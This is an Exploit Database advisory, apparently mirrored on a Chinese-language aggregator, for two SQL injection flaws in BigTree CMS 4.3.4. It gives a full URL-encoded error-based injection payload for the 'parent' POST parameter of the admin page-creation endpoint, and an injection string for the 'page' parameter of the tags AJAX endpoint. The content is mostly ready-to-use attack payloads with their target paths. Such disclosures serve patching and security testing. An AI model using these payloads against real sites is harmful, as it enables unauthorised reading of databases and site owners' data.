BigTree 4.3.4 CMS – Multiple SQL Injection

• Exploit Database
• 115 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46623/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  =========================================================================================== # Exploit Title: BigTree CMS - 'parent' SQL Inj. # Dork: N/A # Date: 24-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.bigtreecms.org/ # Software Link: https://www.bigtreecms.org/download/core/ # Version: v4.3.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: We strongly believe your content managements system shouldn't require you to compromise your vision. BigTree is an extremely extensible open source CMS built on PHP and MySQL. It was created by the expert designers, strategists, and developers at Fastspot to help you make and maintain better websites. =========================================================================================== # POC - SQLi # Parameters : parent # Attack Pattern : -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 # POST Method : http://localhost/BigTree-CMS/site/index.php/admin/pages/create/ =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: BigTree CMS - 'page' SQL Inj. # Dork: N/A # Date: 24-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.bigtreecms.org/ # Software Link: https://www.bigtreecms.org/download/core/ # Version: v4.3.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: We strongly believe your content managements system shouldn't require you to compromise your vision. BigTree is an extremely extensible open source CMS built on PHP and MySQL. It was created by the expert designers, strategists, and developers at Fastspot to help you make and maintain better websites. =========================================================================================== # POC - SQLi # Parameters : page # Attack Pattern : %2527 # GET Method : http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL Inject Here]&sort= ===========================================================================================